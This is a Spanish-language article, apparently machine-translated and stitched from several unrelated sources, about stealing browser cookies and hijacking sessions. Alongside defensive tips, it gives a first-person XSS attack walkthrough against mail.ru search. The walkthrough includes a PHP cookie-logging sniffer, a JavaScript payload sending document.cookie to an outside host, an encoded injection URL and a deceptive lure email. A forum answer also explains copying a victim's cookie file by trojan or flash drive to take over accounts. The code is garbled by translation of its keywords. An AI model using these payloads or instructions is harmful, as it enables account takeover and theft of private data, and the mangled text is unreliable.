Cómo extraer una contraseña de una cookie. Una manera fácil de robar cookies Cookies en todas partes con evercookie

Opera abre el menú principal, ve a la sección "Configuración" y selecciona la línea "Configuración general...". O simplemente puede presionar las teclas de acceso rápido CTRL + F12. Esto abrirá la ventana de configuración del navegador, donde en la pestaña "Avanzado" deberá hacer clic en la sección "Cookies" en el panel izquierdo. En él debe hacer clic en el botón "Administrar cookies".

En Mozilla FireFox, abra la sección "Herramientas" en el menú y seleccione "Configuración". En la ventana de configuración, debe ir a la pestaña “Privacidad”, encontrar allí un botón que dice “Mostrar cookies...” y hacer clic en él para acceder a la lista de cookies almacenadas por el navegador. Puedes buscarlos y verlos aquí.

En Internet Explorer, expanda la sección "Herramientas" en el menú y seleccione "Propiedades". En la ventana de configuración de Propiedades, vaya a la pestaña "General" y haga clic en el botón "Opciones" en la sección "Historial de navegación". De esta manera, abrirá otra ventana (“Opciones de archivos temporales”), en la que deberá hacer clic en el botón “Mostrar archivos”.

Haga clic en el encabezado "Nombre" en la lista de contenidos de la carpeta de almacenamiento de archivos temporales de Internet Explorer que se abre; de ​​esta manera puede agrupar todos los archivos de cookies en un bloque en un montón común de archivos heterogéneos. Aquí puede encontrar el archivo que le interesa y abrirlo en el Bloc de notas estándar para verlo o editarlo.

En Google Chrome, haga clic en el icono de llave inglesa en la esquina superior derecha de la ventana y seleccione Opciones en el menú. El navegador abrirá la página "Configuración", haga clic en el enlace "Avanzado" en su panel izquierdo y en la página de configuración avanzada, haga clic en el botón "Configuración de contenido". Esta no es la última página sobre las cookies almacenadas por este navegador.

Haga clic en el botón "Todas las cookies y datos del sitio" en la página siguiente y finalmente tendrá acceso a la lista de cookies.

Google Chrome ofrece la posibilidad de buscar, ver y eliminar cookies.

En el navegador Safari, haga clic en el ícono de ajustes en la esquina superior derecha y seleccione "Configuración...". En la ventana para cambiar la configuración, debe ir a la pestaña "Seguridad" y hacer clic en el botón "Mostrar cookies". Safari sólo ofrece funciones para buscar y eliminar cookies; el contenido de estos archivos temporales sólo se puede ver parcialmente aquí.

Galletas - información en forma de archivo de texto guardado en el ordenador del usuario por el sitio web. Contiene datos de autenticación (nombre de usuario/contraseña, ID, número de teléfono, dirección de buzón), configuración de usuario y estado de acceso. Almacenado en el perfil del navegador.

Hackeo de cookies es el robo (o "secuestro") de la sesión de un visitante de un recurso web. La información privada está disponible no sólo para el remitente y el destinatario, sino también para un tercero: la persona que llevó a cabo la interceptación.

Herramientas y técnicas de piratería de cookies

Los ladrones de ordenadores, como sus colegas en la vida real, además de habilidades, destreza y conocimientos, por supuesto, también tienen sus propias herramientas: una especie de arsenal de llaves maestras y sondas. Echemos un vistazo a los trucos más populares que utilizan los piratas informáticos para extraer cookies de los usuarios de Internet.

Olfateadores

Programas especiales para monitorear y analizar el tráfico de la red. Su nombre proviene del verbo inglés “sniff” (sniff), porque. literalmente "husmear" paquetes transmitidos entre nodos.

Pero los atacantes utilizan un rastreador para interceptar datos de sesión, mensajes y otra información confidencial. Los objetivos de sus ataques son principalmente redes desprotegidas, donde las cookies se envían en una sesión HTTP abierta, es decir, prácticamente no están cifradas. (El Wi-Fi público es el más vulnerable a este respecto).

Para insertar un rastreador en el canal de Internet entre el nodo de usuario y el servidor web, se utilizan los siguientes métodos:

  • “escuchar” interfaces de red (hubs, conmutadores);
  • bifurcar y copiar tráfico;
  • conectarse a una brecha de canal de red;
  • análisis mediante ataques especiales que redirigen el tráfico de la víctima al sniffer (MAC-spoofing, IP-spoofing).

La abreviatura XSS significa Cross Site Scripting. Se utiliza para atacar sitios web con el fin de robar datos de los usuarios.

El principio de XSS es el siguiente:

  • un atacante inserta código malicioso (un script especial disfrazado) en la página web de un sitio web, foro o en un mensaje (por ejemplo, cuando se comunica en una red social);
  • la víctima accede a la página infectada y activa el código instalado en su PC (hace clic, sigue un enlace, etc.);
  • a su vez, el código malicioso ejecutado "extrae" los datos confidenciales del usuario del navegador (en particular, las cookies) y los envía al servidor web del atacante.

Para "implantar" un mecanismo XSS de software, los piratas informáticos utilizan todo tipo de vulnerabilidades en servidores web, servicios en línea y navegadores.

Todas las vulnerabilidades XSS se dividen en dos tipos:

  • Pasivo. El ataque se obtiene solicitando un script específico en una página web. Se puede inyectar código malicioso en varias formas de una página web (por ejemplo, en la barra de búsqueda de un sitio). Los más susceptibles al XSS pasivo son los recursos que no filtran etiquetas HTML cuando llegan datos;
  • Activo. Ubicado directamente en el servidor. Y se activan en el navegador de la víctima. Los estafadores los utilizan activamente en todo tipo de blogs, chats y canales de noticias.

Los piratas informáticos "camuflan" cuidadosamente sus scripts XSS para que la víctima no sospeche nada. Cambian la extensión del archivo, hacen pasar el código como una imagen, los motivan a seguir el enlace y los atraen con contenido interesante. Como resultado: un usuario de PC, incapaz de controlar su propia curiosidad, envía con sus propias manos (con un clic del ratón) cookies de sesión (¡con nombre de usuario y contraseña!) al autor del script XSS, el villano de la computadora.

Sustitución de cookies

Todas las cookies se guardan y se envían al servidor web (de donde “provienen”) sin ningún cambio, en su forma original, con los mismos valores, cadenas y otros datos. La modificación deliberada de sus parámetros se denomina sustitución de cookies. En otras palabras, al reemplazar las cookies, el atacante finge ser una ilusión. Por ejemplo, al realizar un pago en una tienda en línea, la cookie reduce el monto del pago, por lo que se produce un "ahorro" en las compras.

Las cookies de sesión robadas en una red social de la cuenta de otra persona se "insertan" en otra sesión y en otra PC. El propietario de las cookies robadas obtiene acceso completo a la cuenta de la víctima (correspondencia, contenido, configuración de la página) mientras ella esté en su página.

La “edición” de las cookies se realiza mediante:

  • Funciones “Administrar cookies...” en el navegador Opera;
  • Complementos Cookies Manager y Advanced Cookie Manager para Firefox;
  • Utilidades IECookiesView (solo Internet Explorer);
  • un editor de texto como AkelPad, NotePad o Windows Notepad.

Acceso físico a los datos.

Un esquema de implementación muy simple, que consta de varios pasos. Pero es efectivo sólo si la computadora de la víctima con una sesión abierta, por ejemplo VKontakte, se deja desatendida (¡y durante mucho tiempo!):

  1. Se ingresa una función de JavaScript en la barra de direcciones del navegador para mostrar todas las cookies guardadas.
  2. Después de presionar “ENTER”, todos aparecen en la página.
  3. Las cookies se copian, se guardan en un archivo y luego se transfieren a una unidad flash.
  4. En otra PC, las cookies se reemplazan en una nueva sesión.
  5. Se concede acceso a la cuenta de la víctima.

Como regla general, los piratas informáticos utilizan las herramientas anteriores (+ otras) tanto en combinación (ya que el nivel de protección en muchos recursos web es bastante alto) como por separado (cuando los usuarios son demasiado ingenuos).

XSS + rastreador

  1. Se crea un script XSS que especifica la dirección de un rastreador en línea (ya sea casero o de un servicio específico).
  2. El código malicioso se guarda con la extensión .img (formato de imagen).
  3. Luego, este archivo se carga en una página web, chat o mensaje personal, donde se llevará a cabo el ataque.
  4. Se llama la atención del usuario sobre la “trampa” creada (aquí es donde entra en vigor la ingeniería social).
  5. Si se activa la trampa, el rastreador intercepta las cookies del navegador de la víctima.
  6. El atacante abre los registros del rastreador y recupera las cookies robadas.
  7. A continuación, realiza una sustitución para obtener los derechos del propietario de la cuenta utilizando las herramientas anteriores.

Proteger las cookies de la piratería

  1. Utilice una conexión cifrada (utilizando protocolos y métodos de seguridad adecuados).
  2. No responda a enlaces dudosos, imágenes u ofertas tentadoras para familiarizarse con el “nuevo software gratuito”. Especialmente de extraños.
  3. Utilice únicamente recursos web confiables.
  4. Finalice la sesión autorizada haciendo clic en el botón "Cerrar sesión" (¡no solo cerrando la pestaña!). Especialmente si inició sesión en su cuenta no desde una computadora personal, sino, por ejemplo, desde una PC en un cibercafé.
  5. No utilice la función "Guardar contraseña" del navegador. Los datos de registro almacenados aumentan significativamente el riesgo de robo. No seas perezoso, no pierdas unos minutos ingresando tu contraseña e inicia sesión al comienzo de cada sesión.
  6. Después de navegar por la web (visitar redes sociales, foros, chats, sitios web), elimine las cookies guardadas y borre la memoria caché del navegador.
  7. Actualice periódicamente los navegadores y el software antivirus.
  8. Utilice extensiones de navegador que protejan contra ataques XSS (por ejemplo, NoScript para FF y Google Chrome).
  9. Periódicamente en cuentas.

Y lo más importante: ¡no pierda la vigilancia y la atención mientras se relaja o trabaja en Internet!

En el cual se propuso asistir a un evento gratuito dedicado a temas de seguridad de la información. Como el evento se realizó en mi ciudad, decidí que definitivamente necesitaba ir allí. La primera lección estuvo dedicada a las vulnerabilidades en sitios web como XSS. Después de la lección, decidí que necesitaba consolidar los conocimientos adquiridos en condiciones reales. Elegí varios sitios relacionados con mi ciudad y comencé a intentar insertar mi script en todos los formularios. En la mayoría de los casos, el guión fue filtrado. Pero sucedió que se activó la “alerta” y apareció mi mensaje. Informé a los administradores de la vulnerabilidad encontrada y rápidamente solucionaron todo.

Uno de estos días, mientras revisaba el último correo en mail.ru, me llamó la atención un formulario para buscar cartas en el buzón. De vez en cuando utilizaba esta búsqueda para encontrar algo que necesitaba entre un montón de mis cartas antiguas. Bueno, como en los últimos días inserté mi “alerta” en casi todos los lugares que pude, mi mano buscó reflexivamente este formulario de búsqueda. Escribí el código de mi script y presioné Enter. Imagínense mi sorpresa cuando vi un mensaje dolorosamente familiar en la pantalla...


En la conferencia Open InfoSec Days, el ponente afirmó que los programadores son bastante escépticos ante vulnerabilidades de este tipo y afirman: “¿alerta? Bueno, ¿y qué? Esto no es peligroso". Si en otros sitios me contentaba sólo con esta ventana con mi mensaje, en este caso decidí ir más allá y mostrar lo que puede salir de tal "alerta".

Entonces el script funciona, lo que significa que hay una vulnerabilidad. Por lo tanto, puedes intentar ejecutar algún otro script. Por ejemplo, un script que nos envía las cookies de otro usuario. Para que el script funcione, debemos obligar al usuario a ejecutar nuestro script. Esto se puede hacer enviándole una carta con el enlace correspondiente, luego de hacer clic en el cual se buscará el buzón y se ejecutará el código que necesitamos.

Fue necesaria algo de tiempo y mucha experimentación para comprender la mecánica de la vulnerabilidad. A veces el guión funcionaba, a veces se filtraba. Después de un poco de esfuerzo, se determinó empíricamente que el guión funciona al 100% sólo si la búsqueda de letras da un resultado positivo. Es decir, cuando un usuario realiza una búsqueda con nuestro script, es necesario que se encuentre al menos una letra en su buzón según los parámetros dados. No es difícil arreglar esto.

si (isset($_GET["cookie"]))
{
$text = "Se acepta nueva cookie de". $_SERVER["REMOTE_ADDR"]." en ". fecha("l jS \of F Y h:i:s A");
$texto .= "\n".str_repeat("=", 22) . "\n". $_GET["cookie"]."\n".str_repeat("=", 22)."\n";
$archivo = fopen("sniff.txt", "a");
fwrite($archivo, $texto);
fclose($archivo);
}
?>

Además, en lugar de una "alerta", necesitamos un script que transfiera cookies a nuestro rastreador. Escribiremos este script en un archivo separado y lo cargaremos en nuestra búsqueda. Creé un archivo test.js con el código necesario y lo subí al hosting. El código del script es así:

Img=nueva imagen();
img.src="http://sitename.ru/sniff.php?cookie="+document.cookie;
función F() (
ubicación="http://www.solife.ru";
}
establecerTiempo de espera(F, 5000);

Lo que me gustaría aclarar aquí. Pongámonos en la piel del atacante. Necesitamos que el usuario haga clic en el enlace. ¿Cómo puedo obligarlo a hacer esto? Puede prometer montañas de oro y para recibirlas debe seguir nuestro enlace al sitio. Pero no creo que funcione. La gente ya no cae en esto (yo mismo borro constantemente esas cartas sin siquiera leerlas). Por tanto, jugaremos con la compasión humana, ya que todavía existe en la naturaleza. Le pedimos que vote en el sitio para salvar animales en peligro de extinción. Primero, tomaremos las cookies y luego redirigiremos al usuario al sitio de votación. El tiempo de espera para la redirección se estableció en 5 segundos; de lo contrario, las cookies simplemente no tuvieron tiempo de transferirse al rastreador y el usuario fue redirigido inmediatamente a un sitio sobre animales. En lugar de una "alerta", utilicé el siguiente script:

Cuando terminé con los guiones, comencé a escribir la carta. Se me ocurrió algo como esto:


Resultó bastante cínico, pero traté de acercar las condiciones lo más posible a la realidad. Al final de la carta hay una línea con un guión, esto es para que nuestra carta sea encontrada cuando hagamos una búsqueda. Para que la línea no genere preguntas innecesarias, la pinté de blanco. También puse un espacio en la palabra "http" para que la cadena no fuera reconocida y convertida en un enlace. De lo contrario, a pesar de que la línea del script está escrita en fuente blanca, el destinatario resaltará el enlace en azul y no lo necesitamos. La búsqueda inteligente seguirá encontrando y reconociendo esta cadena, a pesar de los espacios.

E.mail.ru/cgi-bin/gosearch?q_folder=0&q_query=%27%3E%3Cscript%20src%3D%27http%3A%2F%2Fsitename.ru%2Ftest.js%27%3E%3C%2Fscript%3E

Utilicé codificación URL para el script para que no se filtrara nada. También agregué el parámetro “q_folder=0” para la búsqueda, de modo que la búsqueda se realice en la carpeta “Bandeja de entrada”.

La carta está lista, la enviamos. Utilicé mi segundo buzón en el mismo servicio que el destinatario. Veamos qué vino de la otra caja.

El texto de nuestro guión no es visible porque se mezcla con el fondo. Hagamos clic en el enlace y veamos qué pasa. El usuario es trasladado a los resultados de búsqueda de correos electrónicos según el parámetro que especificamos. Nuestra carta que enviamos es visible en los resultados de búsqueda. En este momento, nuestro script ya funcionó y envió las cookies del usuario al rastreador. Después de 5 segundos (el tiempo depende de la configuración del script), el usuario es redirigido al sitio de votación.

Reviso mi archivo sniff.txt:

Como mi objetivo no es robar las cajas de otras personas ni acceder a ellas, terminaré la historia aquí. Pero, en teoría, puedes reemplazar tus cookies con las de otra persona y obtener acceso al buzón de correo de otra persona. En general, si un atacante está interesado en un objetivo, encontrará un uso para la información recibida.

Me gustaría agradecer a Sergei Belov (

La imagen muestra que la cookie contiene la línea wordpress_logged_in_263d663a02379b7624b1028a58464038=admin. Este valor está en forma no cifrada en la cookie y se puede interceptar fácilmente usando la utilidad Achilles, pero en la mayoría de los casos en Achilles solo puedes ver el hash de una entrada en particular. Antes de enviar la solicitud al servidor, puede intentar reemplazar esta línea por otra similar (aunque en este caso no tiene sentido); el número de intentos no está limitado. Luego, al enviar esta solicitud al servidor usando el botón Enviar, puede recibir una respuesta del servidor destinada al administrador.

En el ejemplo anterior, puede utilizar la suplantación directa del ID de usuario. Además, el nombre del parámetro, cuya sustitución de valor proporciona oportunidades adicionales para el hacker, puede ser el siguiente: usuario (por ejemplo, USER=JDOE), cualquier expresión con una cadena ID (por ejemplo, USER=JDOE o SESSIONID= BLAHBLAH), admin (por ejemplo, ADMIN= TRUE), sesión (por ejemplo, SESSION=ACTIVE), carrito (por ejemplo, CART=FULL), así como expresiones como VERDADERO, FALSO, ACTIVO, INACTIVO. Normalmente, el formato de las cookies depende en gran medida de la aplicación para la que se utilizan. Sin embargo, estos consejos para encontrar fallas en las aplicaciones mediante cookies se aplican a casi todos los formatos.

Contramedidas del lado del cliente contra la extracción de cookies

En general, los usuarios deben tener cuidado con los sitios web que utilizan cookies para autenticación y para almacenar datos confidenciales. También es necesario recordar que un sitio Web que utiliza cookies para autenticación debe soportar al menos el protocolo SSL para cifrar el nombre de usuario y la contraseña, ya que en ausencia de este protocolo los datos se transmiten sin cifrar, lo que permite interceptarlos. utilizando herramientas de software simples para ver los datos que se envían a través de la red.

Kookaburra Software ha desarrollado una herramienta para facilitar el uso de cookies. La herramienta se llama CookiePal ( http://www.kburra.com/cpal.html (ver www.kburra.com)). Este programa está diseñado para alertar al usuario cuando un sitio web intenta instalar una cookie en la máquina, y el usuario puede permitir o rechazar esta acción. Actualmente, funciones similares de bloqueo de cookies están disponibles en todos los navegadores.

Otra razón para instalar periódicamente actualizaciones del navegador web es que constantemente se identifican fallas de seguridad en estos programas. Entonces, Bennet Haselton y Jamie McCarthy crearon un script que, después de hacer clic en un enlace, recupera cookies de la máquina del cliente. Como resultado, todo el contenido de las cookies que se encuentran en el equipo del usuario pasa a estar disponible.

Este tipo de truco también se puede realizar usando el mango.

Para garantizar que este tipo de cosas no pongan en peligro nuestros datos personales, lo hago yo mismo y aconsejo a todos que actualicen siempre el software que funcione con código HTML (clientes de correo electrónico, reproductores multimedia, navegadores, etc.).

Mucha gente prefiere simplemente bloquear las cookies, pero la mayoría de los sitios web requieren cookies para poder navegar. Conclusión: si en un futuro próximo aparece una tecnología innovadora que le permitirá prescindir de las cookies, los programadores y administradores darán un suspiro de alivio, ¡pero por ahora las cookies siguen siendo un bocado sabroso para un hacker! Esto es cierto, ya que todavía no existe una alternativa mejor.

Contramedidas del lado del servidor

En caso de recomendaciones para garantizar la seguridad del servidor, los expertos dan un simple consejo: ¡no utilice el mecanismo de cookies a menos que sea absolutamente necesario! Se debe tener especial cuidado al utilizar cookies que permanecen en el sistema del usuario una vez finalizada la sesión de comunicación.

Por supuesto, es importante comprender que las cookies se pueden utilizar para brindar seguridad a los servidores web para la autenticación del usuario. Si su aplicación necesita usar cookies, debe configurar el mecanismo de cookies para usar diferentes claves de corta duración para cada sesión y tratar de no incluir información en estos archivos que los piratas informáticos puedan utilizar para piratear (como ADMIN=TRUE). .

Además, para que el uso de cookies sea más seguro, puede utilizar el cifrado de cookies para evitar que se extraiga información confidencial. Por supuesto, el cifrado no resuelve todos los problemas de seguridad cuando se trabaja con tecnología de cookies, pero este método evitará los ataques más básicos descritos anteriormente.

A la pregunta Cómo conseguir COOKIES cokies. Necesito galletas, como puedo conseguirlas, por favor dime!!! 1 dado por el autor Vlad eeEEeeeeeeeeee la mejor respuesta es ¿Qué son las galletas?
El hecho es que en el proceso de desarrollo de tecnologías www e introducción de lenguajes de programación en Internet, los desarrolladores de programas se enfrentaron a un problema muy grave: ¿cómo guardar los resultados del algoritmo para cada usuario específico durante mucho tiempo? El protocolo HTTP en sí no tiene la capacidad de registrar los resultados de los procesos de software. El uso de sesiones tampoco es una solución al problema, ya que su efecto finaliza inmediatamente después de que se interrumpe la conexión con el servidor.
El problema se resolvió con la introducción del mecanismo de cookies (es decir, traducido del inglés como "cookies"). Las cookies tienen una propiedad notable: se guardan en el disco duro del usuario y pueden almacenarse allí durante un tiempo casi ilimitado.
En esencia, las cookies son archivos de texto ordinarios almacenados en un directorio especial utilizado por el navegador (generalmente esta carpeta se llama Archivos temporales de Internet), y puede verlos yendo a este directorio (el acceso rápido para el navegador IE es a través de Herramientas elementos del menú -> Opciones de Internet -> Archivos temporales de Internet -> Configuración -> Visualización
Algunos valores de cookies solo se pueden almacenar para una sesión y se eliminan cuando se cierra el navegador. Otros, establecidos por un período de tiempo, se escriben en un archivo. Por lo general, este archivo se denomina “cookies.txt” (pero puede haber varias) y se encuentra en el directorio de trabajo del navegador instalado en el ordenador.
en otras palabras
Una cookie es un pequeño fragmento de información de texto que el servidor envía al navegador. Las cookies por sí solas no pueden hacer nada, pero cuando un usuario contacta con el servidor (escribe su dirección en la línea del navegador), el servidor puede leer la información contenida en las cookies y, en base a su análisis, realizar cualquier acción. Por ejemplo, en el caso de un acceso autorizado a algo a través de Internet, el nombre de usuario y la contraseña se almacenan en cookies durante la sesión, lo que permite al usuario no volver a introducirlos al solicitar cada documento protegido con contraseña.
Si está intentando obtener acceso a través de este tema a las cuentas protegidas con contraseña de otras personas, entonces necesita encontrar una manera de forma remota (troyano) o copiándolo descaradamente en una unidad flash, si tiene acceso a la computadora donde trabaja la víctima. , copie este archivo cookies.txt y reemplácelo en el suyo (el mismo) de su navegador. A continuación, va al sitio deseado donde se encuentra la cuenta que le interesa y automáticamente obtiene acceso. Pero tenga en cuenta que si la víctima hace clic en cerrar sesión en la cuenta (por ejemplo, en el correo) al terminar el trabajo, la información sobre la sesión se borrará en las cookies y no recibirá ningún acceso.
Mozilla Firefox almacena cookies en el perfil del usuario, en el archivo C:Documentos y configuracionesNombre de usuarioDatos de aplicaciónMozillaFirefoxProfiles<имя профиля>cookies.txt
Internet Explorer guarda estas cookies como archivos de texto separados en la carpeta C:Documentos y configuraciónNombre de usuarioCookies
Opera almacena cookies en el archivo C:Documentos y configuracionesNombre de usuarioDatos de aplicaciónOperaPerfilcookies4.dat